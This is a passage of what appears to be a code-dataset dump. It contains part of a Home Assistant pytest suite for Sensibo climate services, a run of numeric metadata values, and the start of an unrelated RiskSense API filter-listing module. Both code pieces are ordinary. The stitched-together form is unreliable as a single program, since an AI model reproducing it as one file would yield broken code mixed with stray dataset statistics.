"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["fan_mode"] == "low"
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"swing",
"targetTemperature",
"horizontalSwing",
"light",
],
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state3 = hass.states.get("climate.hallway")
assert state3.attributes["fan_mode"] == "low"
async def test_climate_swing(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate swing service."""
state1 = hass.states.get("climate.hallway")
assert state1.attributes["swing_mode"] == "stopped"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_SWING_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_SWING_MODE: "fixedTop"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["swing_mode"] == "fixedTop"
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"targetTemperature",
"horizontalSwing",
"light",
],
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_SWING_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_SWING_MODE: "fixedTop"},
blocking=True,
)
await hass.async_block_till_done()
state3 = hass.states.get("climate.hallway")
assert state3.attributes["swing_mode"] == "fixedTop"
async def test_climate_temperatures(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate temperature service."""
state1 = hass.states.get("climate.hallway")
assert state1.attributes["temperature"] == 25
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 20},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 15},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 16
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 18.5},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 19
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 24},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 20},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
with pytest.raises(MultipleInvalid):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"swing",
"horizontalSwing",
"light",
],
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_TEMPERATURE: 20},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 20
async def test_climate_temperature_is_none(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate temperature service no temperature provided."""
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"fanLevel",
"targetTemperature",
"swing",
"horizontalSwing",
"light",
],
)
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"target_temp",
25,
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.attributes["temperature"] == 25
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
):
with pytest.raises(ValueError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_TARGET_TEMP_HIGH: 30,
ATTR_TARGET_TEMP_LOW: 20,
},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.attributes["temperature"] == 25
async def test_climate_hvac_mode(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate hvac mode service."""
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"active_features",
[
"timestamp",
"on",
"mode",
"fanLevel",
"targetTemperature",
"swing",
"horizontalSwing",
"light",
],
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.state == "heat"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_HVAC_MODE: "off"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "off"
monkeypatch.setattr(get_data.parsed["ABC999111"], "device_on", False)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_HVAC_MODE: "heat"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "heat"
async def test_climate_on_off(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate on/off service."""
monkeypatch.setattr(get_data.parsed["ABC999111"], "hvac_mode", "heat")
monkeypatch.setattr(get_data.parsed["ABC999111"], "device_on", True)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.state == "heat"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: state1.entity_id},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "off"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: state1.entity_id},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "heat"
async def test_climate_service_failed(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate service failed."""
monkeypatch.setattr(get_data.parsed["ABC999111"], "hvac_mode", "heat")
monkeypatch.setattr(get_data.parsed["ABC999111"], "device_on", True)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.state == "heat"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Error", "failureReason": "Did not work"}},
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: state1.entity_id},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "heat"
async def test_climate_assumed_state(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate assumed state service."""
monkeypatch.setattr(get_data.parsed["ABC999111"], "hvac_mode", "heat")
monkeypatch.setattr(get_data.parsed["ABC999111"], "device_on", True)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert state1.state == "heat"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
DOMAIN,
SERVICE_ASSUME_STATE,
{ATTR_ENTITY_ID: state1.entity_id, ATTR_STATE: "off"},
blocking=True,
)
await hass.async_block_till_done()
state2 = hass.states.get("climate.hallway")
assert state2.state == "off"
async def test_climate_no_fan_no_swing(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate fan service."""
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "high"
assert state.attributes["swing_mode"] == "stopped"
monkeypatch.setattr(get_data.parsed["ABC999111"], "fan_mode", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "swing_mode", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "fan_modes", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "swing_modes", None)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] is None
assert state.attributes["swing_mode"] is None
assert state.attributes["fan_modes"] is None
assert state.attributes["swing_modes"] is None
async def test_climate_set_timer(
hass: HomeAssistant,
entity_registry_enabled_by_default: AsyncMock,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate Set Timer service."""
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert hass.states.get("sensor.hallway_timer_end_time").state == STATE_UNKNOWN
assert hass.states.get("binary_sensor.hallway_timer_running").state == "off"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_timer",
return_value={"status": "success", "result": {"id": "SzTGE4oZ4D"}},
):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "on",
ATTR_MINUTES: 30,
},
blocking=True,
)
await hass.async_block_till_done()
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_on", True)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_id", "SzTGE4oZ4D")
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_state_on", False)
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"timer_time",
datetime(2022, 6, 6, 12, 00, 00, tzinfo=dt.UTC),
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
assert (
hass.states.get("sensor.hallway_timer_end_time").state
== "2022-06-06T12:00:00+00:00"
)
assert hass.states.get("binary_sensor.hallway_timer_running").state == "on"
assert hass.states.get("binary_sensor.hallway_timer_running").attributes == {
"device_class": "running",
"friendly_name": "Hallway Timer Running",
"icon": "mdi:timer",
"id": "SzTGE4oZ4D",
"turn_on": False,
}
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_del_timer",
return_value={"status": "success"},
):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "off",
},
blocking=True,
)
await hass.async_block_till_done()
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_on", False)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_id", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_state_on", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_time", None)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
assert hass.states.get("sensor.hallway_timer_end_time").state == STATE_UNKNOWN
assert hass.states.get("binary_sensor.hallway_timer_running").state == "off"
async def test_climate_set_timer_failures(
hass: HomeAssistant,
entity_registry_enabled_by_default: AsyncMock,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate Set Timer service failures."""
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
state1 = hass.states.get("climate.hallway")
assert hass.states.get("sensor.hallway_timer_end_time").state == STATE_UNKNOWN
assert hass.states.get("binary_sensor.hallway_timer_running").state == "off"
with pytest.raises(ValueError):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "on",
},
blocking=True,
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_timer",
return_value={"status": "success", "result": {"id": ""}},
):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "on",
ATTR_MINUTES: 30,
},
blocking=True,
)
await hass.async_block_till_done()
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_on", True)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_id", None)
monkeypatch.setattr(get_data.parsed["ABC999111"], "timer_state_on", False)
monkeypatch.setattr(
get_data.parsed["ABC999111"],
"timer_time",
datetime(2022, 6, 6, 12, 00, 00, tzinfo=dt.UTC),
)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "off",
},
blocking=True,
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=get_data,
):
async_fire_time_changed(
hass,
dt.utcnow() + timedelta(minutes=5),
)
await hass.async_block_till_done()
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices_data",
return_value=get_data,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_timer",
return_value={"status": "failure"},
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
DOMAIN,
SERVICE_TIMER,
{
ATTR_ENTITY_ID: state1.entity_id,
ATTR_STATE: "on",
ATTR_MINUTES: 30,
},
blocking=True,
)
await hass.async_block_till_done()
| 31.685022
| 92
| 0.629788
| 3,041
| 28,770
| 5.675765
| 0.062151
| 0.025956
| 0.081692
| 0.091251
| 0.888934
| 0.878969
| 0.861124
| 0.857358
| 0.825666
| 0.819119
| 0
| 0.020004
| 0.261522
| 28,770
| 907
| 93
| 31.719956
| 0.792384
| 0.001668
| 0
| 0.746803
| 0
| 0
| 0.222832
| 0.136108
| 0
| 0
| 0
| 0
| 0.066496
| 1
| 0
| false
| 0
| 0.019182
| 0
| 0.019182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc4238f3fd29874cef96bf0ba9098dad50aa9c49
| 109,357
|
py
|
Python
|
packages/risksense_api/__subject/__filters/__filters.py
|
PRASANTHBHARADHWAAJ/risksense_tools
|
d9f95ac3c7107bb4114c958455c7194211ff951b
|
[
"Apache-2.0"
] | 4
|
2020-12-24T15:20:23.000Z
|
2021-12-26T17:41:46.000Z
|
packages/risksense_api/__subject/__filters/__filters.py
|
PRASANTHBHARADHWAAJ/risksense_tools
|
d9f95ac3c7107bb4114c958455c7194211ff951b
|
[
"Apache-2.0"
] | 4
|
2020-10-08T19:53:36.000Z
|
2020-11-11T20:52:36.000Z
|
packages/risksense_api/__subject/__filters/__filters.py
|
PRASANTHBHARADHWAAJ/risksense_tools
|
d9f95ac3c7107bb4114c958455c7194211ff951b
|
[
"Apache-2.0"
] | 2
|
2021-06-18T01:27:31.000Z
|
2021-12-20T03:19:31.000Z
|
""" *******************************************************************************************************************
|
| Name : __filters.py
| Module : risksense_api
| Description : A class to be used for interacting with filters on the RiskSense Platform.
| Copyright : (c) RiskSense, Inc.
| License : Apache-2.0 (http://www.apache.org/licenses/LICENSE-2.0)
|
******************************************************************************************************************* """
import json
from ...__subject import Subject
from ..._api_request_handler import *
class FilterSubject:
""" FilterSubject class and params"""
APPLICATION = "application"
APPLICATION_FINDING = "applicationFinding"
APPLICATION_MANUAL_EXPLOIT = "applicationManualExploit"
APPLICATION_URL = "applicationUrl"
ASSESSMENT = "assessment"
CLIENT = "client"
DATABASE = "database"
DATABASE_FINDING = "databaseFinding"
GROUP = "group"
HOST = "host"
HOST_FINDING = "hostFinding"
HOST_MANUAL_EXPLOIT = "hostManualExploit"
NETWORK = "network"
PATCH = "patch"
TAG = "tag"
UNIQUE_APPLICATION_FINDING = "uniqueApplicationFinding"
UNIQUE_HOST_FINDING = "uniqueHostFinding"
USER = "user"
class Filters(Subject):
""" Filters class """
def __init__(self, profile):
"""
Initialization of Filters object.
:param profile: Profile Object
:type profile: _profile
"""
self.subject_name = "filter"
Subject.__init__(self, profile, self.subject_name)
self.alt_api_base_url = self.profile.platform_url + "/api/v1/client/{}/search/{}/filter"
def list_filters(self, filter_subject, client_id=None):
"""
List all saved filters available for the specified filter_subject.
:param filter_subject: Supported Subjects are: FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: FilterSubject attribute
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.alt_api_base_url.format(str(client_id), filter_subject)
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.GET, url)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
return jsonified_response
def list_application_filters(self, client_id=None):
"""
List application filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.APPLICATION, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_appfinding_filters(self, client_id=None):
"""
List application finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.APPLICATION_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_app_manual_exploit_filters(self, client_id=None):
"""
List application manual exploit filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.APPLICATION_MANUAL_EXPLOIT, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_app_url_filters(self, client_id=None):
"""
List application URL filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.APPLICATION_URL, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_assessment_filters(self, client_id=None):
"""
List assessment filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.ASSESSMENT, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_client_filters(self, client_id=None):
"""
List client filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.CLIENT, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_database_filters(self, client_id=None):
"""
List database filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.DATABASE, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_database_finding_filters(self, client_id=None):
"""
List database finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.DATABASE_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_group_filters(self, client_id=None):
"""
List group filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.GROUP, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_host_filters(self, client_id=None):
"""
List host filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.HOST, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_hostfinding_filters(self, client_id=None):
"""
List host finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.HOST_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_host_manual_exploit_filters(self, client_id=None):
"""
List host manual exploit filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.HOST_MANUAL_EXPLOIT, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_network_filters(self, client_id=None):
"""
List network filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.NETWORK, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_patch_filters(self, client_id=None):
"""
List patch filters
